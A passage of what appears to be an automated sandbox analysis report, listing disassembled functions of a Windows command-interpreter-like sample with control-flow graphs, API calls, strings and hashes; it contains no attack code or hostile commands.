                                                                                          Similarity
                                                                                          • API ID: InfoLocale$DefaultUsersetlocale
                                                                                          • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                                          • API String ID: 1351325837-2236139042
                                                                                          • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction ID: 7713900477f3f8d8e52751cdd624954ced5c50fbe5774ac975e413b007fd9b75
                                                                                          • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                                                                          • Instruction Fuzzy Hash: 75F17C76B0A743A5EF218F11D9102B966E4FF49B81F944136CA0E977A4EF3CE919E300
                                                                                          Function 00007FF6A0E84224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 483 7ff6a0e84224-7ff6a0e842a5 InitializeProcThreadAttributeList 484 7ff6a0e842ab-7ff6a0e842e5 UpdateProcThreadAttribute 483->484 485 7ff6a0e8ecd4-7ff6a0e8ecee GetLastError call 7ff6a0e99eec 483->485 486 7ff6a0e8ecf0-7ff6a0e8ed19 GetLastError call 7ff6a0e99eec DeleteProcThreadAttributeList 484->486 487 7ff6a0e842eb-7ff6a0e843c6 memset * 2 GetStartupInfoW call 7ff6a0e83a90 call 7ff6a0e7b900 484->487 494 7ff6a0e8ed1e 485->494 486->494 497 7ff6a0e843cc-7ff6a0e843d3 487->497 498 7ff6a0e84638-7ff6a0e84644 _local_unwind 487->498 499 7ff6a0e84649-7ff6a0e84650 497->499 500 7ff6a0e843d9-7ff6a0e843dc 497->500 498->499 499->500 503 7ff6a0e84656-7ff6a0e8465d 499->503 501 7ff6a0e84415-7ff6a0e84424 call 7ff6a0e85a68 500->501 502 7ff6a0e843de-7ff6a0e843f5 wcsrchr 500->502 510 7ff6a0e8442a-7ff6a0e84486 CreateProcessW 501->510 511 7ff6a0e84589-7ff6a0e84590 501->511 502->501 504 7ff6a0e843f7-7ff6a0e8440f lstrcmpW 502->504 503->501 506 7ff6a0e84663 503->506 504->501 507 7ff6a0e84668-7ff6a0e8466d call 7ff6a0e99044 504->507 506->500 507->501 513 7ff6a0e8448b-7ff6a0e8448f 510->513 511->510 514 7ff6a0e84596-7ff6a0e845fa CreateProcessAsUserW 511->514 515 7ff6a0e84495-7ff6a0e844c7 CloseHandle call 7ff6a0e8498c 513->515 516 7ff6a0e84672-7ff6a0e84682 GetLastError 513->516 514->513 519 7ff6a0e8468d-7ff6a0e84694 515->519 520 7ff6a0e844cd-7ff6a0e844e5 515->520 516->519 521 7ff6a0e84696-7ff6a0e846a0 519->521 522 7ff6a0e846a2-7ff6a0e846ac 519->522 523 7ff6a0e844eb-7ff6a0e844f2 520->523 524 7ff6a0e847a3-7ff6a0e847a9 520->524 521->522 525 7ff6a0e846ae-7ff6a0e846b5 call 7ff6a0e897bc 521->525 522->525 526 7ff6a0e84705-7ff6a0e84707 522->526 527 7ff6a0e844f8-7ff6a0e84507 523->527 528 7ff6a0e845ff-7ff6a0e84607 523->528 541 7ff6a0e846b7-7ff6a0e84701 call 7ff6a0ecc038 525->541 542 7ff6a0e84703 525->542 526->520 530 7ff6a0e8470d-7ff6a0e8472a call 7ff6a0e7cd90 526->530 531 7ff6a0e8450d-7ff6a0e84553 call 7ff6a0e85cb4 call 7ff6a0e833f0 call 7ff6a0e8498c 527->531 532 7ff6a0e84612-7ff6a0e84616 527->532 528->527 533 7ff6a0e8460d 528->533 543 7ff6a0e8473d-7ff6a0e84767 call 7ff6a0e813e0 call 7ff6a0e99eec call 7ff6a0e7ff70 _local_unwind 530->543 544 7ff6a0e8472c-7ff6a0e84738 _local_unwind 530->544 565 7ff6a0e84558-7ff6a0e8455e 531->565 539 7ff6a0e8461c-7ff6a0e84633 532->539 540 7ff6a0e847d7-7ff6a0e847df 532->540 538 7ff6a0e8476c-7ff6a0e84773 533->538 538->527 548 7ff6a0e84779-7ff6a0e84780 538->548 545 7ff6a0e847f2-7ff6a0e8483c call 7ff6a0e7ff70 DeleteProcThreadAttributeList call 7ff6a0e88f80 539->545 540->545 546 7ff6a0e847e1-7ff6a0e847ed CloseHandle 540->546 541->526 542->526 543->538 544->543 546->545 548->527 553 7ff6a0e84786-7ff6a0e84789 548->553 553->527 558 7ff6a0e8478f-7ff6a0e84792 553->558 558->524 562 7ff6a0e84794-7ff6a0e8479d call 7ff6a0e9a250 558->562 562->524 562->527 568 7ff6a0e84564-7ff6a0e84579 call 7ff6a0e8498c 565->568 569 7ff6a0e847ae-7ff6a0e847ca call 7ff6a0e833f0 565->569 568->545 576 7ff6a0e8457f-7ff6a0e84584 call 7ff6a0e9a920 568->576 569->540 576->545
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                                                                          • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                                                                          • API String ID: 388421343-2905461000
                                                                                          • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                          • Instruction ID: 255a05a14fb6cb33d52738a41380a037e367046f06414d7f9ce9ad700b134595
                                                                                          • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                                                                          • Instruction Fuzzy Hash: 07F13E72A0AB83A6EB60DB21E4447BAB7E4FB89780F544136D94D83755DF3CE448EB00
                                                                                          Function 00007FF6A0E85554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 579 7ff6a0e85554-7ff6a0e855b9 call 7ff6a0e8a640 582 7ff6a0e855bc-7ff6a0e855e8 RegOpenKeyExW 579->582 583 7ff6a0e85887-7ff6a0e8588e 582->583 584 7ff6a0e855ee-7ff6a0e85631 RegQueryValueExW 582->584 583->582 587 7ff6a0e85894-7ff6a0e858db time srand call 7ff6a0e88f80 583->587 585 7ff6a0e85637-7ff6a0e85675 RegQueryValueExW 584->585 586 7ff6a0e8f248-7ff6a0e8f24d 584->586 590 7ff6a0e85677-7ff6a0e8567c 585->590 591 7ff6a0e8568e-7ff6a0e856cc RegQueryValueExW 585->591 588 7ff6a0e8f24f-7ff6a0e8f25b 586->588 589 7ff6a0e8f260-7ff6a0e8f265 586->589 588->585 589->585 593 7ff6a0e8f26b-7ff6a0e8f286 _wtol 589->593 594 7ff6a0e85682-7ff6a0e85687 590->594 595 7ff6a0e8f28b-7ff6a0e8f290 590->595 596 7ff6a0e8f2b6-7ff6a0e8f2bb 591->596 597 7ff6a0e856d2-7ff6a0e85710 RegQueryValueExW 591->597 593->585 594->591 595->591 599 7ff6a0e8f296-7ff6a0e8f2b1 _wtol 595->599 600 7ff6a0e8f2ce-7ff6a0e8f2d3 596->600 601 7ff6a0e8f2bd-7ff6a0e8f2c9 596->601 602 7ff6a0e85729-7ff6a0e85767 RegQueryValueExW 597->602 603 7ff6a0e85712-7ff6a0e85717 597->603 599->591 600->597 606 7ff6a0e8f2d9-7ff6a0e8f2f4 _wtol 600->606 601->597 604 7ff6a0e85769-7ff6a0e8576e 602->604 605 7ff6a0e8579f-7ff6a0e857dd RegQueryValueExW 602->605 607 7ff6a0e8571d-7ff6a0e85722 603->607 608 7ff6a0e8f2f9-7ff6a0e8f2fe 603->608 609 7ff6a0e8f320-7ff6a0e8f325 604->609 610 7ff6a0e85774-7ff6a0e8578f 604->610 611 7ff6a0e857e3-7ff6a0e857e8 605->611 612 7ff6a0e8f3a9 605->612 606->597 607->602 608->602 613 7ff6a0e8f304-7ff6a0e8f31a wcstol 608->613 618 7ff6a0e8f327-7ff6a0e8f33f wcstol 609->618 619 7ff6a0e8f34b 609->619 614 7ff6a0e85795-7ff6a0e85799 610->614 615 7ff6a0e8f357-7ff6a0e8f35e 610->615 616 7ff6a0e8f363-7ff6a0e8f368 611->616 617 7ff6a0e857ee-7ff6a0e85809 611->617 624 7ff6a0e8f3b5-7ff6a0e8f3b8 612->624 613->609 614->605 614->615 615->605 620 7ff6a0e8f38e 616->620 621 7ff6a0e8f36a-7ff6a0e8f382 wcstol 616->621 622 7ff6a0e8f39a-7ff6a0e8f39d 617->622 623 7ff6a0e8580f-7ff6a0e85813 617->623 618->619 619->615 620->622 621->620 622->612 623->622 625 7ff6a0e85819-7ff6a0e85823 623->625 626 7ff6a0e8f3be-7ff6a0e8f3c5 624->626 627 7ff6a0e8582c 624->627 625->624 628 7ff6a0e85829 625->628 629 7ff6a0e85832-7ff6a0e85870 RegQueryValueExW 626->629 627->629 630 7ff6a0e8f3ca-7ff6a0e8f3d1 627->630 628->627 631 7ff6a0e85876-7ff6a0e85882 RegCloseKey 629->631 632 7ff6a0e8f3dd-7ff6a0e8f3e2 629->632 630->632 631->583 633 7ff6a0e8f433-7ff6a0e8f439 632->633 634 7ff6a0e8f3e4-7ff6a0e8f412 ExpandEnvironmentStringsW 632->634 633->631 637 7ff6a0e8f43f-7ff6a0e8f44c call 7ff6a0e7b900 633->637 635 7ff6a0e8f414-7ff6a0e8f426 call 7ff6a0e813e0 634->635 636 7ff6a0e8f428 634->636 639 7ff6a0e8f42e 635->639 636->639 637->631 639->633
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                          • API String ID: 145004033-3846321370
                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction ID: dd2d415f5053c54afd40c8c787a3dc5f3a3acde9204612535fdafece7548fd6f
                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                          • Instruction Fuzzy Hash: 65E1763291EA83E6E7508F10E45057AB7B0FB89745F505536FA8E82B58DF7CD548EB00
                                                                                          Function 00007FF6A0E837D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 821 7ff6a0e837d8-7ff6a0e83887 GetCurrentThreadId OpenThread call 7ff6a0e804f4 HeapSetInformation RegOpenKeyExW 824 7ff6a0e8388d-7ff6a0e838eb call 7ff6a0e85920 GetConsoleOutputCP GetCPInfo 821->824 825 7ff6a0e8e9f8-7ff6a0e8ea3b RegQueryValueExW RegCloseKey 821->825 828 7ff6a0e8ea41-7ff6a0e8ea59 GetThreadLocale 824->828 829 7ff6a0e838f1-7ff6a0e83913 memset 824->829 825->828 830 7ff6a0e8ea74-7ff6a0e8ea77 828->830 831 7ff6a0e8ea5b-7ff6a0e8ea67 828->831 832 7ff6a0e83919-7ff6a0e83935 call 7ff6a0e84d5c 829->832 833 7ff6a0e8eaa5 829->833 834 7ff6a0e8ea94-7ff6a0e8ea96 830->834 835 7ff6a0e8ea79-7ff6a0e8ea7d 830->835 831->830 841 7ff6a0e8393b-7ff6a0e83942 832->841 842 7ff6a0e8eae2-7ff6a0e8eaff call 7ff6a0e73240 call 7ff6a0e98530 call 7ff6a0e84c1c 832->842 838 7ff6a0e8eaa8-7ff6a0e8eab4 833->838 834->833 835->834 837 7ff6a0e8ea7f-7ff6a0e8ea89 835->837 837->834 838->832 840 7ff6a0e8eaba-7ff6a0e8eac3 838->840 843 7ff6a0e8eacb-7ff6a0e8eace 840->843 844 7ff6a0e83948-7ff6a0e83962 _setjmp 841->844 845 7ff6a0e8eb27-7ff6a0e8eb40 _setjmp 841->845 850 7ff6a0e8eb00-7ff6a0e8eb0d 842->850 846 7ff6a0e8ead0-7ff6a0e8eadb 843->846 847 7ff6a0e8eac5-7ff6a0e8eac9 843->847 844->850 851 7ff6a0e83968-7ff6a0e8396d 844->851 852 7ff6a0e8eb46-7ff6a0e8eb49 845->852 853 7ff6a0e839fe-7ff6a0e83a05 call 7ff6a0e84c1c 845->853 846->838 854 7ff6a0e8eadd 846->854 847->843 863 7ff6a0e8eb15-7ff6a0e8eb1f call 7ff6a0e84c1c 850->863 856 7ff6a0e839b9-7ff6a0e839bb 851->856 857 7ff6a0e8396f 851->857 859 7ff6a0e8eb66-7ff6a0e8eb6f call 7ff6a0e801b8 852->859 860 7ff6a0e8eb4b-7ff6a0e8eb65 call 7ff6a0e73240 call 7ff6a0e98530 call 7ff6a0e84c1c 852->860 853->825 854->832 867 7ff6a0e8eb20 856->867 868 7ff6a0e839c1-7ff6a0e839c3 call 7ff6a0e84c1c 856->868 864 7ff6a0e83972-7ff6a0e8397d 857->864 880 7ff6a0e8eb71-7ff6a0e8eb82 _setmode 859->880 881 7ff6a0e8eb87-7ff6a0e8eb89 call 7ff6a0e886f0 859->881 860->859 863->867 873 7ff6a0e839c9-7ff6a0e839de call 7ff6a0e7df60 864->873 874 7ff6a0e8397f-7ff6a0e83984 864->874 867->845 877 7ff6a0e839c8 868->877 873->863 889 7ff6a0e839e4-7ff6a0e839e8 873->889 874->864 883 7ff6a0e83986-7ff6a0e839ae call 7ff6a0e80580 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 874->883 877->873 880->881 890 7ff6a0e8eb8e-7ff6a0e8ebad call 7ff6a0e858e4 call 7ff6a0e7df60 881->890 898 7ff6a0e839b3 883->898 889->853 893 7ff6a0e839ea-7ff6a0e839ef call 7ff6a0e7be00 889->893 902 7ff6a0e8ebaf-7ff6a0e8ebb3 890->902 899 7ff6a0e839f4-7ff6a0e839fc 893->899 898->856 899->874 902->853 903 7ff6a0e8ebb9-7ff6a0e8ec24 call 7ff6a0e858e4 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 call 7ff6a0e7be00 call 7ff6a0e80580 GetConsoleOutputCP GetCPInfo call 7ff6a0e804f4 902->903 903->890
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                          • API String ID: 2624720099-1920437939
                                                                                          • Opcode ID: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction ID: c786eafd111a8c63eec94746b35b16ada20bbfb6b08092003f3d44e5bcc1eff9
                                                                                          • Opcode Fuzzy Hash: 0bf09e208e1b0c6bea64f33002f51ec0bb7d1cb9bc02841e8aeeb1d0e4bcf9a4
                                                                                          • Instruction Fuzzy Hash: B5C1F131E0A783AAF7149B74A4501BD7AA0FF4A751F548139DA1ED77A6DF3CE448A300
                                                                                          Function 00007FF6A0E8823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1118 7ff6a0e8823c-7ff6a0e8829b FindFirstFileExW 1119 7ff6a0e882cd-7ff6a0e882df 1118->1119 1120 7ff6a0e8829d-7ff6a0e882a9 GetLastError 1118->1120 1124 7ff6a0e88365-7ff6a0e8837b FindNextFileW 1119->1124 1125 7ff6a0e882e5-7ff6a0e882ee 1119->1125 1121 7ff6a0e882af 1120->1121 1122 7ff6a0e882b1-7ff6a0e882cb 1121->1122 1126 7ff6a0e883d0-7ff6a0e883e5 FindClose 1124->1126 1127 7ff6a0e8837d-7ff6a0e88380 1124->1127 1128 7ff6a0e882f1-7ff6a0e882f4 1125->1128 1126->1128 1127->1119 1129 7ff6a0e88386 1127->1129 1130 7ff6a0e882f6-7ff6a0e88300 1128->1130 1131 7ff6a0e88329-7ff6a0e8832b 1128->1131 1129->1120 1133 7ff6a0e88332-7ff6a0e88353 GetProcessHeap HeapAlloc 1130->1133 1134 7ff6a0e88302-7ff6a0e8830e 1130->1134 1131->1121 1132 7ff6a0e8832d 1131->1132 1132->1120 1135 7ff6a0e88356-7ff6a0e88363 1133->1135 1136 7ff6a0e88310-7ff6a0e88313 1134->1136 1137 7ff6a0e8838b-7ff6a0e883c2 GetProcessHeap HeapReAlloc 1134->1137 1135->1136 1138 7ff6a0e88315-7ff6a0e88323 1136->1138 1139 7ff6a0e88327 1136->1139 1140 7ff6a0e950f8-7ff6a0e9511e GetLastError FindClose 1137->1140 1141 7ff6a0e883c8-7ff6a0e883ce 1137->1141 1138->1139 1139->1131 1140->1122 1141->1135
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                          • String ID:
                                                                                          • API String ID: 873889042-0
                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction ID: 76166c059a0e4b6c045fe78a706f38366120d9a7e3cc253bfad90c1bdf02e995
                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                          • Instruction Fuzzy Hash: 5E514E76A0AB83E6E7108F11E944279BBB1FB8AB91F548131DE1D83361DF3CE454A700
                                                                                          Function 00007FF6A0E82978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1142 7ff6a0e82978-7ff6a0e829b6 1143 7ff6a0e829b9-7ff6a0e829c1 1142->1143 1143->1143 1144 7ff6a0e829c3-7ff6a0e829c5 1143->1144 1145 7ff6a0e829cb-7ff6a0e829cf 1144->1145 1146 7ff6a0e8e441 1144->1146 1147 7ff6a0e829d2-7ff6a0e829da 1145->1147 1148 7ff6a0e829dc-7ff6a0e829e1 1147->1148 1149 7ff6a0e82a1e-7ff6a0e82a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff6a0e829e3-7ff6a0e829eb 1148->1150 1151 7ff6a0e8e435-7ff6a0e8e439 1149->1151 1152 7ff6a0e82a44-7ff6a0e82a5c FindClose 1149->1152 1150->1147 1153 7ff6a0e829ed-7ff6a0e82a1c call 7ff6a0e88f80 1150->1153 1151->1146 1154 7ff6a0e82ae3-7ff6a0e82ae5 1152->1154 1155 7ff6a0e82a62-7ff6a0e82a6e 1152->1155 1158 7ff6a0e82aeb-7ff6a0e82b10 _wcsnicmp 1154->1158 1159 7ff6a0e8e3f7-7ff6a0e8e3ff 1154->1159 1157 7ff6a0e82a70-7ff6a0e82a78 1155->1157 1157->1157 1162 7ff6a0e82a7a-7ff6a0e82a8d 1157->1162 1158->1155 1160 7ff6a0e82b16-7ff6a0e8e3f1 _wcsicmp 1158->1160 1160->1155 1160->1159 1162->1146 1164 7ff6a0e82a93-7ff6a0e82a97 1162->1164 1165 7ff6a0e82a9d-7ff6a0e82ade memmove call 7ff6a0e813e0 1164->1165 1166 7ff6a0e8e404-7ff6a0e8e407 1164->1166 1165->1150 1167 7ff6a0e8e40b-7ff6a0e8e413 1166->1167 1167->1167 1169 7ff6a0e8e415-7ff6a0e8e42b memmove 1167->1169 1169->1151
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction ID: a08bc8b71ebd25870bfc35215c9b3a460c066f3dd1fc8cf72c4975d465745b6c
                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                          • Instruction Fuzzy Hash: C8513731B0A683A5EB308F15A9542BAA2A0FF54BA4F484235DE6E877D0DF3CE449D300
                                                                                          Function 00007FF6A0E84A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1207 7ff6a0e84a14-7ff6a0e84a3e GetEnvironmentStringsW 1208 7ff6a0e84a40-7ff6a0e84a46 1207->1208 1209 7ff6a0e84aae-7ff6a0e84ac5 1207->1209 1210 7ff6a0e84a59-7ff6a0e84a8f GetProcessHeap HeapAlloc 1208->1210 1211 7ff6a0e84a48-7ff6a0e84a52 1208->1211 1212 7ff6a0e84a91-7ff6a0e84a9a memmove 1210->1212 1213 7ff6a0e84a9f-7ff6a0e84aa9 FreeEnvironmentStringsW 1210->1213 1211->1211 1214 7ff6a0e84a54-7ff6a0e84a57 1211->1214 1212->1213 1213->1209 1214->1210 1214->1211
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A28
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A66
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A7D
                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84A9A
                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6A0E849F1), ref: 00007FF6A0E84AA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                          • String ID:
                                                                                          • API String ID: 1623332820-0
                                                                                          • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                          • Instruction ID: 6c5731bd2cf5a4169009e10ca608cd6828d385bd8f221c788b61ab3c621e1308
                                                                                          • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                          • Instruction Fuzzy Hash: 6A119E72A1AB4392DE149B62A404039BBE0FB8DF81F599039EE4E47784EE3DE8459740
                                                                                          Function 00007FF6A0E84D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
